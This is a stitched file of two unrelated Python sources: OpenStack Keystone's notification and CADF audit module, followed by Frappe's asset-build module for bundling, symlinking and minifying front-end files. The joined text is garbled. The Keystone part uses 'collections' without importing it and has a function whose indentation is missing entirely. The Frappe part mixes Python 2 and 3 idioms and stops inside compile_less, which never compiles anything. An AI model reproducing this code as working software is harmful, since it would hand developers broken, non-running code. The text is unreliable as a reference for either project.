import functools
import inspect
import logging
import socket
from oslo_config import cfg
from oslo_log import log
from oslo_log import versionutils
import oslo_messaging
import pycadf
from pycadf import cadftaxonomy as taxonomy
from pycadf import cadftype
from pycadf import credential
from pycadf import eventfactory
from pycadf import resource
from keystone.i18n import _, _LE
notifier_opts = [
    cfg.StrOpt('default_publisher_id',
               help='Default publisher_id for outgoing notifications'),
    cfg.StrOpt('notification_format', default='basic',
               choices=['basic', 'cadf'],
               help='Define the notification format for Identity Service '
                    'events. A "basic" notification has information about '
                    'the resource being operated on. A "cadf" notification '
                    'has the same information, as well as information about '
                    'the initiator of the event.'),
]

# Options are registered at the top (global) level, not under a named section.
config_section = None


def list_opts():
    """Return the oslo.config options for option discovery tooling."""
    return [(config_section, notifier_opts), ]


LOG = log.getLogger(__name__)

# NOTE(gyee): actions that can be notified. One must update this list whenever
# a new action is supported.
_ACTIONS = collections.namedtuple(
    'NotificationActions',
    'created, deleted, disabled, updated, internal')
ACTIONS = _ACTIONS(created='created', deleted='deleted', disabled='disabled',
                   updated='updated', internal='internal')
"""The actions on resources."""

# Mapping of notified resource types to their CADF taxonomy type URIs.
CADF_TYPE_MAP = {
    'group': taxonomy.SECURITY_GROUP,
    'project': taxonomy.SECURITY_PROJECT,
    'role': taxonomy.SECURITY_ROLE,
    'user': taxonomy.SECURITY_ACCOUNT_USER,
    'domain': taxonomy.SECURITY_DOMAIN,
    'region': taxonomy.SECURITY_REGION,
    'endpoint': taxonomy.SECURITY_ENDPOINT,
    'service': taxonomy.SECURITY_SERVICE,
    'policy': taxonomy.SECURITY_POLICY,
    'OS-TRUST:trust': taxonomy.SECURITY_TRUST,
    'OS-OAUTH1:access_token': taxonomy.SECURITY_CREDENTIAL,
    'OS-OAUTH1:request_token': taxonomy.SECURITY_CREDENTIAL,
    'OS-OAUTH1:consumer': taxonomy.SECURITY_ACCOUNT,
}

SAML_AUDIT_TYPE = 'http://docs.oasis-open.org/security/saml/v2.0'
# resource types that can be notified
_SUBSCRIBERS = {}
# Lazily constructed by _get_notifier(): None = not built yet, False = build
# failed, otherwise an oslo.messaging Notifier instance.
_notifier = None
SERVICE = 'identity'
CONF = cfg.CONF
CONF.register_opts(notifier_opts)

# NOTE(morganfainberg): Special case notifications that are only used
# internally for handling token persistence token deletions
INVALIDATE_USER_TOKEN_PERSISTENCE = 'invalidate_user_tokens'
INVALIDATE_USER_PROJECT_TOKEN_PERSISTENCE = 'invalidate_user_project_tokens'
INVALIDATE_USER_OAUTH_CONSUMER_TOKENS = 'invalidate_user_consumer_tokens'
class Audit(object):
    """Namespace for audit notification functions.

    This is a namespace object to contain all of the direct notification
    functions utilized for ``Manager`` methods.
    """

    @classmethod
    def _emit(cls, operation, resource_type, resource_id, initiator, public):
        """Directly send an event notification.

        :param operation: one of the values from ACTIONS
        :param resource_type: type of resource being affected
        :param resource_id: ID of the resource affected
        :param initiator: CADF representation of the user that created the
                          request
        :param public: If True (default), the event will be sent to the
                       notifier API. If False, the event will only be sent via
                       notify_event_callbacks to in process listeners
        """
        # NOTE(stevemar): _send_notification is overloaded — it registers
        # callbacks and also sends the notification externally — so the
        # notification-format check happens inside it rather than here.
        _send_notification(operation, resource_type, resource_id,
                           public=public)
        # CADF events carry initiator information and are only emitted for
        # public events.
        if public and CONF.notification_format == 'cadf':
            _create_cadf_payload(operation, resource_type, resource_id,
                                 taxonomy.OUTCOME_SUCCESS, initiator)

    @classmethod
    def created(cls, resource_type, resource_id, initiator=None,
                public=True):
        cls._emit(ACTIONS.created, resource_type, resource_id, initiator,
                  public)

    @classmethod
    def updated(cls, resource_type, resource_id, initiator=None,
                public=True):
        cls._emit(ACTIONS.updated, resource_type, resource_id, initiator,
                  public)

    @classmethod
    def disabled(cls, resource_type, resource_id, initiator=None,
                 public=True):
        cls._emit(ACTIONS.disabled, resource_type, resource_id, initiator,
                  public)

    @classmethod
    def deleted(cls, resource_type, resource_id, initiator=None,
                public=True):
        cls._emit(ACTIONS.deleted, resource_type, resource_id, initiator,
                  public)
class ManagerNotificationWrapper(object):
    """Send event notifications for ``Manager`` methods.

    Sends a notification if the wrapped Manager method does not raise an
    ``Exception`` (such as ``keystone.exception.NotFound``).

    :param operation: one of the values from ACTIONS
    :param resource_type: type of resource being affected
    :param public: If True (default), the event will be sent to the notifier
                   API. If False, the event will only be sent via
                   notify_event_callbacks to in process listeners
    :param resource_id_arg_index: positional index of the resource id in the
                                  wrapped method's arguments (default: first
                                  argument after ``self``)
    :param result_id_arg_attr: when set, read the resource id from this key of
                               the wrapped method's result instead
    """

    def __init__(self, operation, resource_type, public=True,
                 resource_id_arg_index=1, result_id_arg_attr=None):
        self.operation = operation
        self.resource_type = resource_type
        self.public = public
        self.resource_id_arg_index = resource_id_arg_index
        self.result_id_arg_attr = result_id_arg_attr

    def __call__(self, f):
        @functools.wraps(f)  # preserve the wrapped method's name and docstring
        def wrapper(*args, **kwargs):
            """Send a notification if the wrapped callable is successful."""
            # Any exception propagates unchanged and suppresses the
            # notification.
            result = f(*args, **kwargs)
            if self.result_id_arg_attr is not None:
                resource_id = result[self.result_id_arg_attr]
            else:
                resource_id = args[self.resource_id_arg_index]
            # NOTE(stevemar): the _send_notification function is
            # overloaded, it's used to register callbacks and to actually
            # send the notification externally. Thus, we should check
            # the desired notification format in the function instead
            # of before it.
            _send_notification(
                self.operation,
                self.resource_type,
                resource_id,
                public=self.public)
            # Only emit CADF notifications for public events
            if CONF.notification_format == 'cadf' and self.public:
                # NOTE(morganfainberg): The decorator form will always use
                # a 'None' initiator, since we do not pass context around
                # in a manner that allows the decorator to inspect context
                # and extract the needed information.
                _create_cadf_payload(self.operation, self.resource_type,
                                     resource_id, taxonomy.OUTCOME_SUCCESS,
                                     None)
            return result
        return wrapper
def created(*args, **kwargs):
    """Decorator to send notifications for ``Manager.create_*`` methods."""
    return ManagerNotificationWrapper(ACTIONS.created, *args, **kwargs)


def updated(*args, **kwargs):
    """Decorator to send notifications for ``Manager.update_*`` methods."""
    return ManagerNotificationWrapper(ACTIONS.updated, *args, **kwargs)


def disabled(*args, **kwargs):
    """Decorator to send notifications when an object is disabled."""
    return ManagerNotificationWrapper(ACTIONS.disabled, *args, **kwargs)


def deleted(*args, **kwargs):
    """Decorator to send notifications for ``Manager.delete_*`` methods."""
    return ManagerNotificationWrapper(ACTIONS.deleted, *args, **kwargs)


def internal(*args, **kwargs):
    """Decorator to send notifications for internal notifications only.

    Forces ``public=False`` so the event only reaches in-process listeners
    and is never sent to the external notifier API.
    """
    kwargs['public'] = False
    return ManagerNotificationWrapper(ACTIONS.internal, *args, **kwargs)
def _get_callback_info(callback):
"""Return list containing callback's module and name.
If the callback is an instance method also return the class name.
:param callback: Function to call
:type callback: function
:returns: List containing parent module, (optional class,) function name
:rtype: list
"""
if getattr(callback, 'im_class', None):
return [getattr(callback, '__module__', None),
callback.im_class.__name__,
callback.__name__]
else:
return [getattr(callback, '__module__', None), callback.__name__]
def register_event_callback(event, resource_type, callbacks):
    """Register each callback with the event.

    :param event: Action being registered
    :type event: keystone.notifications.ACTIONS
    :param resource_type: Type of resource being operated on
    :type resource_type: str
    :param callbacks: Callback items to be registered with event
    :type callbacks: list
    :raises ValueError: If event is not a valid ACTION
    :raises TypeError: If callback is not callable
    """
    if event not in ACTIONS:
        raise ValueError(_('%(event)s is not a valid notification event, must '
                           'be one of: %(actions)s') %
                         {'event': event, 'actions': ', '.join(ACTIONS)})
    if not hasattr(callbacks, '__iter__'):
        # A single callback was passed; normalise to a list.
        callbacks = [callbacks]
    for cb in callbacks:
        if not callable(cb):
            msg = _('Method not callable: %s') % cb
            LOG.error(msg)
            raise TypeError(msg)
        _SUBSCRIBERS.setdefault(event, {}).setdefault(resource_type,
                                                      set()).add(cb)
        if LOG.logger.getEffectiveLevel() <= logging.DEBUG:
            # Building the callback description is not free, so only do it
            # when the message will actually appear in the logs.
            parts = _get_callback_info(cb)
            callback_str = '.'.join(p for p in parts if p is not None)
            event_str = '.'.join(['identity', resource_type, event])
            LOG.debug('Callback: `%(callback)s` subscribed to event '
                      '`%(event)s`.',
                      {'callback': callback_str, 'event': event_str})
def listener(cls):
    """A class decorator to declare a class to be a notification listener.

    A notification listener must specify the event(s) it is interested in by
    defining a ``event_callbacks`` attribute or property. ``event_callbacks``
    is a dictionary where the key is the type of event and the value is a
    dictionary containing a mapping of resource types to callback(s).

    :data:`.ACTIONS` contains constants for the currently
    supported events. There is currently no single place to find constants for
    the resource types.

    Example::

        @listener
        class Something(object):

            event_callbacks = {
                notifications.ACTIONS.created: {
                    'user': self._user_created_callback,
                },
                notifications.ACTIONS.deleted: {
                    'project': [
                        self._project_deleted_callback,
                        self._do_cleanup,
                    ]
                },
            }

    """
    original_init = cls.__init__

    @functools.wraps(original_init)
    def __new_init__(self, *args, **kwargs):
        # Run the class's own initialiser first, then register every
        # callback declared in ``event_callbacks``.
        original_init(self, *args, **kwargs)
        for event, resource_types in self.event_callbacks.items():
            for resource_type, callbacks in resource_types.items():
                register_event_callback(event, resource_type, callbacks)

    cls.__init__ = __new_init__
    return cls
def notify_event_callbacks(service, resource_type, operation, payload):
    """Send a notification to registered extensions.

    :param service: service emitting the event (e.g. ``identity``)
    :param resource_type: type of resource the event concerns
    :param operation: one of the values from ACTIONS
    :param payload: event payload dict passed to each callback
    """
    # No subscribers registered for this operation/resource pair is the
    # common case; fall through silently.
    callbacks = _SUBSCRIBERS.get(operation, {}).get(resource_type, ())
    for cb in callbacks:
        subst_dict = {'cb_name': cb.__name__,
                      'service': service,
                      'resource_type': resource_type,
                      'operation': operation,
                      'payload': payload}
        # BUG FIX: the message previously read "...%(operation)s for%(payload)s"
        # (missing space between 'for' and the payload).
        LOG.debug('Invoking callback %(cb_name)s for event '
                  '%(service)s %(resource_type)s %(operation)s for '
                  '%(payload)s', subst_dict)
        cb(service, resource_type, operation, payload)
def _get_notifier():
    """Return a notifier object, constructing it on first use.

    ``_notifier`` has three states: ``None`` means no notifier has been set
    yet; ``False`` means a previous construction attempt failed; otherwise it
    is a constructed Notifier object.
    """
    global _notifier
    if _notifier is not None:
        return _notifier
    host = CONF.default_publisher_id or socket.gethostname()
    try:
        transport = oslo_messaging.get_transport(CONF)
        _notifier = oslo_messaging.Notifier(transport,
                                            "identity.%s" % host)
    except Exception:
        LOG.exception(_LE("Failed to construct notifier"))
        _notifier = False
    return _notifier
def clear_subscribers():
    """Empty subscribers dictionary.

    This effectively stops notifications since there will be no subscribers
    to publish to.
    """
    # Clear in place so any existing references to _SUBSCRIBERS observe the
    # emptied state.
    _SUBSCRIBERS.clear()
def reset_notifier():
    """Reset the notifications internal state.

    This is used only for testing purposes.
    """
    global _notifier
    # None forces _get_notifier() to rebuild the notifier on next use.
    _notifier = None
def _create_cadf_payload(operation, resource_type, resource_id,
                         outcome, initiator):
    """Prepare data for CADF audit notifier.

    Transform the arguments into content to be consumed by the function that
    emits CADF events (_send_audit_notification). Specifically the
    ``resource_type`` (role, user, etc) must be transformed into a CADF
    keyword, such as: ``data/security/role``. The ``resource_id`` is added as a
    top level value for the ``resource_info`` key. Lastly, the ``operation`` is
    used to create the CADF ``action``, and the ``event_type`` name.

    As per the CADF specification, the ``action`` must start with create,
    update, delete, etc... i.e.: created.user or deleted.role

    However the ``event_type`` is an OpenStack-ism that is typically of the
    form project.resource.operation. i.e.: identity.project.updated

    :param operation: operation being performed (created, updated, or deleted)
    :param resource_type: type of resource being operated on (role, user, etc)
    :param resource_id: ID of resource being operated on
    :param outcome: outcomes of the operation (SUCCESS, FAILURE, etc)
    :param initiator: CADF representation of the user that created the request
    """
    # Unmapped resource types fall back to the generic CADF 'unknown' URI.
    target_uri = CADF_TYPE_MAP.get(resource_type, taxonomy.UNKNOWN)
    target = resource.Resource(typeURI=target_uri,
                               id=resource_id)
    audit_kwargs = {'resource_info': resource_id}
    cadf_action = '%s.%s' % (operation, resource_type)
    event_type = '%s.%s.%s' % (SERVICE, resource_type, operation)

    _send_audit_notification(cadf_action, initiator, outcome,
                             target, event_type, **audit_kwargs)
def _send_notification(operation, resource_type, resource_id, public=True):
    """Send notification to inform observers about the affected resource.

    This method doesn't raise an exception when sending the notification fails.

    :param operation: operation being performed (created, updated, or deleted)
    :param resource_type: type of resource being operated on
    :param resource_id: ID of resource being operated on
    :param public: if True (default), the event will be sent
                   to the notifier API.
                   if False, the event will only be sent via
                   notify_event_callbacks to in process listeners.
    """
    payload = {'resource_info': resource_id}
    notify_event_callbacks(SERVICE, resource_type, operation, payload)

    # Only send this notification if the 'basic' format is used, otherwise
    # let the CADF functions handle sending the notification. But we check
    # here so as to not disrupt the notify_event_callbacks function.
    if not public or CONF.notification_format != 'basic':
        return
    notifier = _get_notifier()
    if not notifier:
        return
    event_type = '%(service)s.%(resource_type)s.%(operation)s' % {
        'service': SERVICE,
        'resource_type': resource_type,
        'operation': operation}
    try:
        notifier.info({}, event_type, payload)
    except Exception:
        LOG.exception(_LE(
            'Failed to send %(res_id)s %(event_type)s notification'),
            {'res_id': resource_id, 'event_type': event_type})
def _get_request_audit_info(context, user_id=None):
    """Collect audit information about the request used for CADF.

    :param context: Request context
    :param user_id: Optional user ID, alternatively collected from context
    :returns: Auditing data about the request
    :rtype: :class:`pycadf.Resource`
    """
    remote_addr = None
    http_user_agent = None
    project_id = None
    domain_id = None

    environment = context.get('environment') if context else None
    if environment:
        remote_addr = environment.get('REMOTE_ADDR')
        http_user_agent = environment.get('HTTP_USER_AGENT')
        # Hoist the auth context lookup instead of re-fetching it for each
        # field.
        auth_context = environment.get('KEYSTONE_AUTH_CONTEXT', {})
        if not user_id:
            user_id = auth_context.get('user_id')
        project_id = auth_context.get('project_id')
        domain_id = auth_context.get('domain_id')

    host = pycadf.host.Host(address=remote_addr, agent=http_user_agent)
    initiator = resource.Resource(typeURI=taxonomy.ACCOUNT_USER,
                                  id=user_id, host=host)
    # Scope attributes are only attached when present in the auth context.
    if project_id:
        initiator.project_id = project_id
    if domain_id:
        initiator.domain_id = domain_id

    return initiator
class CadfNotificationWrapper(object):
    """Send CADF event notifications for various methods.

    This function is only used for Authentication events. Its ``action`` and
    ``event_type`` are dictated below.

    - action: authenticate
    - event_type: identity.authenticate

    Sends CADF notifications for events such as whether an authentication was
    successful or not.

    :param operation: The authentication related action being performed
    """

    def __init__(self, operation):
        self.action = operation
        self.event_type = '%s.%s' % (SERVICE, operation)

    def __call__(self, f):
        @functools.wraps(f)  # preserve the wrapped method's name/docstring
        def wrapper(wrapped_self, context, user_id, *args, **kwargs):
            """Always send a notification."""
            initiator = _get_request_audit_info(context, user_id)
            target = resource.Resource(typeURI=taxonomy.ACCOUNT_USER)
            try:
                result = f(wrapped_self, context, user_id, *args, **kwargs)
            except Exception:
                # For authentication failure send a cadf event as well
                _send_audit_notification(self.action, initiator,
                                         taxonomy.OUTCOME_FAILURE,
                                         target, self.event_type)
                raise
            else:
                _send_audit_notification(self.action, initiator,
                                         taxonomy.OUTCOME_SUCCESS,
                                         target, self.event_type)
                return result

        return wrapper
class CadfRoleAssignmentNotificationWrapper(object):
    """Send CADF notifications for ``role_assignment`` methods.

    This function is only used for role assignment events. Its ``action`` and
    ``event_type`` are dictated below.

    - action: created.role_assignment or deleted.role_assignment
    - event_type: identity.role_assignment.created or
        identity.role_assignment.deleted

    Sends a CADF notification if the wrapped method does not raise an
    ``Exception`` (such as ``keystone.exception.NotFound``).

    :param operation: one of the values from ACTIONS (create or delete)
    """
    ROLE_ASSIGNMENT = 'role_assignment'
    def __init__(self, operation):
        # e.g. 'created.role_assignment'
        self.action = '%s.%s' % (operation, self.ROLE_ASSIGNMENT)
        # old event-type layout, e.g. 'identity.created.role_assignment'
        self.deprecated_event_type = '%s.%s.%s' % (SERVICE, operation,
                                                   self.ROLE_ASSIGNMENT)
        # new event-type layout, e.g. 'identity.role_assignment.created'
        self.event_type = '%s.%s.%s' % (SERVICE, self.ROLE_ASSIGNMENT,
                                        operation)
    def __call__(self, f):
        def wrapper(wrapped_self, role_id, *args, **kwargs):
            """Send a notification if the wrapped callable is successful."""
            """ NOTE(stevemar): The reason we go through checking kwargs
            and args for possible target and actor values is because the
            create_grant() (and delete_grant()) method are called
            differently in various tests.
            Using named arguments, i.e.:
                create_grant(user_id=user['id'], domain_id=domain['id'],
                             role_id=role['id'])

            Or, using positional arguments, i.e.:
                create_grant(role_id['id'], user['id'], None,
                             domain_id=domain['id'], None)

            Or, both, i.e.:
                create_grant(role_id['id'], user_id=user['id'],
                             domain_id=domain['id'])

            Checking the values for kwargs is easy enough, since it comes
            in as a dictionary

            The actual method signature is
                create_grant(role_id, user_id=None, group_id=None,
                             domain_id=None, project_id=None,
                             inherited_to_projects=False)

            So, if the values of actor or target are still None after
            checking kwargs, we can check the positional arguments,
            based on the method signature.
            """
            # normalize positional/keyword call styles into a single dict
            # keyed by the wrapped function's parameter names
            call_args = inspect.getcallargs(
                f, wrapped_self, role_id, *args, **kwargs)
            inherited = call_args['inherited_to_projects']
            context = call_args['context']
            initiator = _get_request_audit_info(context)
            target = resource.Resource(typeURI=taxonomy.ACCOUNT_USER)
            # the grant scope is either a project or a domain, and the
            # grantee is either a user or a group - record whichever is set
            audit_kwargs = {}
            if call_args['project_id']:
                audit_kwargs['project'] = call_args['project_id']
            elif call_args['domain_id']:
                audit_kwargs['domain'] = call_args['domain_id']
            if call_args['user_id']:
                audit_kwargs['user'] = call_args['user_id']
            elif call_args['group_id']:
                audit_kwargs['group'] = call_args['group_id']
            audit_kwargs['inherited_to_projects'] = inherited
            audit_kwargs['role'] = role_id
            # For backward compatibility, send both old and new event_type.
            # Deprecate old format and remove it in the next release.
            event_types = [self.deprecated_event_type, self.event_type]
            versionutils.deprecated(
                as_of=versionutils.deprecated.KILO,
                remove_in=+1,
                what=('sending duplicate %s notification event type' %
                      self.deprecated_event_type),
                in_favor_of='%s notification event type' % self.event_type)
            try:
                result = f(wrapped_self, role_id, *args, **kwargs)
            except Exception:
                # audit the failure under both event types, then re-raise
                for event_type in event_types:
                    _send_audit_notification(self.action, initiator,
                                             taxonomy.OUTCOME_FAILURE,
                                             target, event_type,
                                             **audit_kwargs)
                raise
            else:
                for event_type in event_types:
                    _send_audit_notification(self.action, initiator,
                                             taxonomy.OUTCOME_SUCCESS,
                                             target, event_type,
                                             **audit_kwargs)
                return result
        return wrapper
def send_saml_audit_notification(action, context, user_id, group_ids,
                                 identity_provider, protocol, token_id,
                                 outcome):
    """Send notification to inform observers about SAML events.

    :param action: Action being audited
    :type action: str
    :param context: Current request context to collect request info from
    :type context: dict
    :param user_id: User ID from Keystone token
    :type user_id: str
    :param group_ids: List of Group IDs from Keystone token
    :type group_ids: list
    :param identity_provider: ID of the IdP from the Keystone token
    :type identity_provider: str or None
    :param protocol: Protocol ID for IdP from the Keystone token
    :type protocol: str
    :param token_id: audit_id from Keystone token
    :type token_id: str or None
    :param outcome: One of :class:`pycadf.cadftaxonomy`
    :type outcome: str
    """
    initiator = _get_request_audit_info(context)
    target = resource.Resource(typeURI=taxonomy.ACCOUNT_USER)
    # attach the federated-credential details to the initiator, substituting
    # the CADF 'unknown' marker for missing identifiers
    initiator.credential = credential.FederatedCredential(
        token=token_id or taxonomy.UNKNOWN,
        type=SAML_AUDIT_TYPE,
        identity_provider=identity_provider,
        user=user_id or taxonomy.UNKNOWN,
        groups=group_ids or [])
    event_type = '%s.%s' % (SERVICE, action)
    _send_audit_notification(action, initiator, outcome, target, event_type)
def _send_audit_notification(action, initiator, outcome, target,
                             event_type, **kwargs):
    """Send CADF notification to inform observers about the affected resource.

    This method logs an exception when sending the notification fails.

    :param action: CADF action being audited (e.g., 'authenticate')
    :param initiator: CADF resource representing the initiator
    :param outcome: The CADF outcome (taxonomy.OUTCOME_PENDING,
        taxonomy.OUTCOME_SUCCESS, taxonomy.OUTCOME_FAILURE)
    :param target: CADF resource representing the target
    :param event_type: An OpenStack-ism, typically this is the meter name that
        Ceilometer uses to poll events.
    :param kwargs: Any additional arguments passed in will be added as
        key-value pairs to the CADF event.
    """
    event = eventfactory.EventFactory().new_event(
        eventType=cadftype.EVENTTYPE_ACTIVITY,
        outcome=outcome,
        action=action,
        initiator=initiator,
        target=target,
        observer=resource.Resource(typeURI=taxonomy.SERVICE_SECURITY))
    # fold any extra detail (role, project, domain, ...) into the event
    for attr_name, attr_value in kwargs.items():
        setattr(event, attr_name, attr_value)
    payload = event.as_dict()
    notifier = _get_notifier()
    if not notifier:
        return
    try:
        notifier.info({}, event_type, payload)
    except Exception:
        # diaper defense: any exception that occurs while emitting the
        # notification should not interfere with the API request
        LOG.exception(_LE(
            'Failed to send %(action)s %(event_type)s notification'),
            {'action': action, 'event_type': event_type})
# Public decorator aliases: ``emit_event`` audits authentication events,
# ``role_assignment`` audits grant create/delete events.
emit_event = CadfNotificationWrapper
role_assignment = CadfRoleAssignmentNotificationWrapper
| |
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals, print_function
from frappe.utils.minify import JavascriptMinify
import warnings
from six import iteritems, text_type
import subprocess
from distutils.spawn import find_executable
"""
Build the `public` folders and setup languages
"""
import os, frappe, json, shutil, re
app_paths = None
def setup():
	"""Populate the module-global `app_paths` with the base directory of
	every installed app whose Python module can be imported."""
	global app_paths
	modules = []
	for app in frappe.get_all_apps(True):
		try:
			modules.append(frappe.get_module(app))
		except ImportError:
			# apps that fail to import are silently skipped
			pass
	app_paths = [os.path.dirname(module.__file__) for module in modules]
def get_node_pacman():
	"""Return the full path of the preferred Node.js package manager.

	yarn is preferred over npm.

	:raises ValueError: if neither yarn nor npm is on the PATH.
	"""
	# shutil.which replaces the deprecated distutils.spawn.find_executable
	# (distutils is deprecated by PEP 632); shutil is already imported above
	for pacman in ('yarn', 'npm'):
		executable = shutil.which(pacman)
		if executable:
			return executable
	raise ValueError('No Node.js Package Manager found.')
def bundle(no_compress, app=None, make_copy=False, restore=False, verbose=False):
	"""Concatenate / minify js files by invoking the Node.js build script."""
	setup()
	make_asset_dirs(make_copy=make_copy, restore=restore)
	# assemble e.g. "yarn run production --app myapp"
	parts = [get_node_pacman(), 'run', 'build' if no_compress else 'production']
	if app:
		parts.extend(['--app', app])
	command = ' '.join(parts)
	frappe_app_path = os.path.abspath(os.path.join(app_paths[0], '..'))
	check_yarn()
	frappe.commands.popen(command, cwd=frappe_app_path)
def watch(no_compress):
	"""Watch source files and rebuild bundles when they change.

	:param no_compress: accepted for signature compatibility with bundle();
		the Node watch task is invoked regardless of its value.
	"""
	setup()
	pacman = get_node_pacman()
	check_yarn()
	# the original computed frappe_app_path twice; only the value derived
	# from frappe.get_app_path was ever used, so the dead assignment from
	# app_paths[0] has been removed
	frappe_app_path = frappe.get_app_path('frappe', '..')
	frappe.commands.popen('{pacman} run watch'.format(pacman=pacman), cwd = frappe_app_path)
def check_yarn():
	"""Print install instructions if the yarn executable is not on the PATH.

	Purely advisory: always returns None and never raises.
	"""
	# shutil.which replaces the deprecated distutils.spawn.find_executable,
	# which also removes the redundant function-local import; the useless
	# trailing bare `return` is dropped as well
	if not shutil.which('yarn'):
		print('Please install yarn using below command and try again.')
		print('npm install -g yarn')
def make_asset_dirs(make_copy=False, restore=False):
	"""Create the sites/assets tree and link (or copy) each app's public
	assets into it.

	For every installed app, app/public, app/node_modules and (if present)
	the docs folder are symlinked under sites/assets. With ``make_copy`` the
	folders are copied instead, but existing targets are left untouched;
	with ``restore`` existing targets are deleted and replaced by copies.
	"""
	# don't even think of making assets_path absolute - rm -rf ahead.
	assets_path = os.path.join(frappe.local.sites_path, "assets")
	for dir_path in [
			os.path.join(assets_path, 'js'),
			os.path.join(assets_path, 'css')]:
		if not os.path.exists(dir_path):
			os.makedirs(dir_path)
	for app_name in frappe.get_all_apps(True):
		pymodule = frappe.get_module(app_name)
		app_base_path = os.path.abspath(os.path.dirname(pymodule.__file__))
		# each entry is a [source, target] pair
		symlinks = []
		# app/public > assets/app
		symlinks.append([os.path.join(app_base_path, 'public'), os.path.join(assets_path, app_name)])
		# app/node_modules > assets/app/node_modules
		symlinks.append([os.path.join(app_base_path, '..', 'node_modules'), os.path.join(assets_path, app_name, 'node_modules')])
		app_doc_path = None
		if os.path.isdir(os.path.join(app_base_path, 'docs')):
			app_doc_path = os.path.join(app_base_path, 'docs')
		elif os.path.isdir(os.path.join(app_base_path, 'www', 'docs')):
			app_doc_path = os.path.join(app_base_path, 'www', 'docs')
		if app_doc_path:
			symlinks.append([app_doc_path, os.path.join(assets_path, app_name + '_docs')])
		for source, target in symlinks:
			source = os.path.abspath(source)
			if os.path.exists(source):
				if restore:
					# replace whatever is at the target with a fresh copy
					if os.path.exists(target):
						if os.path.islink(target):
							os.unlink(target)
						else:
							shutil.rmtree(target)
					shutil.copytree(source, target)
				elif make_copy:
					# copy, but never clobber an existing target
					if os.path.exists(target):
						warnings.warn('Target {target} already exists.'.format(target = target))
					else:
						shutil.copytree(source, target)
				else:
					# default: symlink, replacing any existing link or tree
					if os.path.exists(target):
						if os.path.islink(target):
							os.unlink(target)
						else:
							shutil.rmtree(target)
					os.symlink(source, target)
			else:
				# missing sources (e.g. apps without node_modules) are ignored
				# warnings.warn('Source {source} does not exist.'.format(source = source))
				pass
def build(no_compress=False, verbose=False):
	"""Pack every build target into the sites/assets directory."""
	assets_path = os.path.join(frappe.local.sites_path, "assets")
	build_maps = get_build_maps()
	for target, sources in iteritems(build_maps):
		pack(os.path.join(assets_path, target), sources, no_compress, verbose)
def get_build_maps():
	"""Collect every app's build.json and return {target: [absolute source paths]}."""
	build_maps = {}
	for app_path in app_paths:
		path = os.path.join(app_path, 'public', 'build.json')
		if not os.path.exists(path):
			continue
		with open(path) as f:
			try:
				for target, sources in iteritems(json.loads(f.read())):
					resolved = []
					for source in sources:
						if isinstance(source, list):
							# [app, "path/inside/app"] entries resolve via the app module
							resolved.append(frappe.get_pymodule_path(source[0], *source[1].split("/")))
						else:
							resolved.append(os.path.join(app_path, source))
					build_maps[target] = resolved
			except ValueError as e:
				print(path)
				print('JSON syntax error {0}'.format(str(e)))
	return build_maps
timestamps = {}
def pack(target, sources, no_compress, verbose):
	"""Concatenate (and optionally minify) `sources` into the file `target`.

	Records each source file's mtime in the module-level `timestamps` dict
	so that files_dirty() can later detect changes.

	NOTE(review): text_type(str, 'utf-8') and writing outtxt.encode() to a
	text-mode file only work on Python 2 - this function appears py2-only;
	confirm before running under py3.
	"""
	from six import StringIO
	# output type is inferred from the target's extension (js / css)
	outtype, outtxt = target.split(".")[-1], ''
	jsm = JavascriptMinify()
	for f in sources:
		suffix = None
		# a ':suffix' marker (e.g. 'file.js:concat') opts a file out of minification
		if ':' in f: f, suffix = f.split(':')
		if not os.path.exists(f) or os.path.isdir(f):
			print("did not find " + f)
			continue
		timestamps[f] = os.path.getmtime(f)
		try:
			with open(f, 'r') as sourcefile:
				data = text_type(sourcefile.read(), 'utf-8', errors='ignore')
				extn = f.rsplit(".", 1)[1]
				if outtype=="js" and extn=="js" and (not no_compress) and suffix!="concat" and (".min." not in f):
					# minify plain .js files unless compression is disabled
					tmpin, tmpout = StringIO(data.encode('utf-8')), StringIO()
					jsm.minify(tmpin, tmpout)
					minified = tmpout.getvalue()
					if minified:
						outtxt += text_type(minified or '', 'utf-8').strip('\n') + ';'
					if verbose:
						print("{0}: {1}k".format(f, int(len(minified) / 1024)))
				elif outtype=="js" and extn=="html":
					# add to frappe.templates
					outtxt += html_to_js_template(f, data)
				else:
					# passthrough with a banner comment naming the source file
					outtxt += ('\n/*\n *\t%s\n */' % f)
					outtxt += '\n' + data + '\n'
		except Exception:
			# a broken source file must not abort the whole bundle
			print("--Error in:" + f + "--")
			print(frappe.get_traceback())
	with open(target, 'w') as f:
		f.write(outtxt.encode("utf-8"))
	print("Wrote %s - %sk" % (target, str(int(os.path.getsize(target)/1024))))
def html_to_js_template(path, content):
	'''returns HTML template content as Javascript code, adding it to `frappe.templates`'''
	# template key is the file name without its ".html" extension
	key = path.rsplit("/", 1)[-1][:-5]
	return """frappe.templates["{key}"] = '{content}';\n""".format(
		key=key, content=scrub_html_template(content))
def scrub_html_template(content):
	'''Return HTML content with whitespace collapsed, comments stripped, and
	single quotes escaped so the result can be embedded inside a
	single-quoted Javascript string literal.'''
	# collapse all runs of whitespace to a single space (raw string avoids
	# the invalid "\s" escape in a plain string literal)
	content = re.sub(r"\s+", " ", content)
	# strip HTML comments
	content = re.sub(r"(<!--.*?-->)", "", content)
	# BUGFIX: replace("'", "\'") was a no-op because "\'" == "'"; the intent
	# (see html_to_js_template) is to escape quotes for a '-quoted JS string
	return content.replace("'", "\\'")
def files_dirty():
	"""Return True if any packed source file changed since its recorded mtime."""
	for target, sources in iteritems(get_build_maps()):
		for source in sources:
			# drop the ':suffix' marker (e.g. 'file.js:concat') if present
			if ':' in source:
				source, _suffix = source.split(':')
			if not os.path.exists(source) or os.path.isdir(source):
				continue
			if os.path.getmtime(source) != timestamps.get(source):
				print(source + ' dirty')
				return True
	return False
def compile_less():
	"""Compile each app's public/less/*.less into public/css/*.css.

	Skips variables.less, and skips any file whose mtime matches the one
	recorded in `timestamps` (i.e. unchanged since the last compile).
	Does nothing when the lessc executable is not installed.
	"""
	# shutil.which replaces the deprecated distutils.spawn.find_executable
	# (removes the redundant function-local import as well)
	if not shutil.which("lessc"):
		return
	for path in app_paths:
		less_path = os.path.join(path, "public", "less")
		if not os.path.exists(less_path):
			continue
		for fname in os.listdir(less_path):
			if not fname.endswith(".less") or fname == "variables.less":
				continue
			fpath = os.path.join(less_path, fname)
			mtime = os.path.getmtime(fpath)
			if fpath in timestamps and mtime == timestamps[fpath]:
				# unchanged since last compile
				continue
			timestamps[fpath] = mtime
